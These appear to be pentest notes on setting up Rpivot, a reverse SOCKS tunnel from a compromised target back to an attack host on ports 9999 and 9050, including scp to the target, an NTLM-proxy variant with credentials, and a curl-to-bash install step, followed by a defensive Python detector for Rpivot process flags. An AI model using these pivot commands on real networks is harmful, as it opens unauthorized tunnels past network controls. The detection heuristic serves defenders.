Prerequisites
- Python 2.7 environment
sudo apt-get install python2.7
Alternative install for Python 2.7 (via pyenv)
curl https://pyenv.run | bash
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(pyenv init -)"' >> ~/.bashrc
source ~/.bashrc
pyenv install 2.7
pyenv shell 2.7
- Rpivot repo cloned on attack machine and/or target
git clone https://github.com/klsecservices/rpivot.git
Server (Attack Host)
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
- Listens on 0.0.0.0:9999 (server port).
- Exposes a SOCKS proxy on 9050.
Transfer Rpivot to Target
scp -r rpivot ubuntu@<IPaddressOfTarget>:~/
Client (Target Host)
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
- Connects back to the Rpivot server.
Rpivot with NTLM HTTP Proxy (Other Example)
python client.py --server-ip TargetIP --server-port 8080 --ntlm-proxy-ip ProxyIP --ntlm-proxy-port 8081 --domain nameofWindowsDomain --username username --password password
- Example when dealing with an HTTP proxy that uses NTLM authentication in front of the Rpivot server.
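From the defender's side, the client and server invocations above leave a recognizable flag combination in the process table. The following is an added example, not part of the original notes or the Rpivot project: a heuristic that scans process listings for those flag sets and reports the callback endpoint and whether a password was passed on the command line. The flag names come from the commands above; the process lines, user names, renamed script and 192.0.2.x addresses are constructed sample data.

```python
# Constructed sample of `ps -eo pid=,user=,args=` output (headers suppressed).
SAMPLE_PS = """\
  812 root     /usr/sbin/sshd -D
 4021 ubuntu   python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
 4100 svc      python upd.py --server-ip 192.0.2.7 --server-port=8080 --ntlm-proxy-ip 192.0.2.9 --ntlm-proxy-port 8081 --domain CORP --username alice --password S3cret
 5150 kali     python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
 6001 www      python manage.py runserver --port 8000
"""

def parse_flags(argv):
    """Collect `--flag value` and `--flag=value` pairs from an argument list."""
    flags = {}
    for i, tok in enumerate(argv):
        if not tok.startswith("--"):
            continue
        name, eq, val = tok.partition("=")
        if not eq:  # value is the next token, unless that is another flag
            nxt = argv[i + 1] if i + 1 < len(argv) else ""
            val = "" if nxt.startswith("--") else nxt
        flags[name] = val
    return flags

def classify(flags):
    """Heuristic: match the flag combination so a renamed script still hits."""
    names = set(flags)
    if {"--proxy-port", "--server-port"} <= names:
        return "rpivot-server"
    if {"--server-ip", "--server-port"} <= names:
        return "rpivot-client-ntlm" if "--ntlm-proxy-ip" in names else "rpivot-client"
    return None

def scan(ps_output):
    findings = []
    for line in ps_output.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        flags = parse_flags(parts[2].split())
        role = classify(flags)
        if role:
            endpoint = "%s:%s" % (flags.get("--server-ip", "?"), flags["--server-port"])
            findings.append({"pid": int(parts[0]), "user": parts[1], "role": role,
                             "endpoint": endpoint,
                             "cleartext_password": "--password" in flags})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_PS):
        print(finding)
```

Because the match is on flag names only, other software that happens to take `--server-ip` and `--server-port` will also be reported, so treat a hit as a lead to correlate with outbound connections to the reported endpoint.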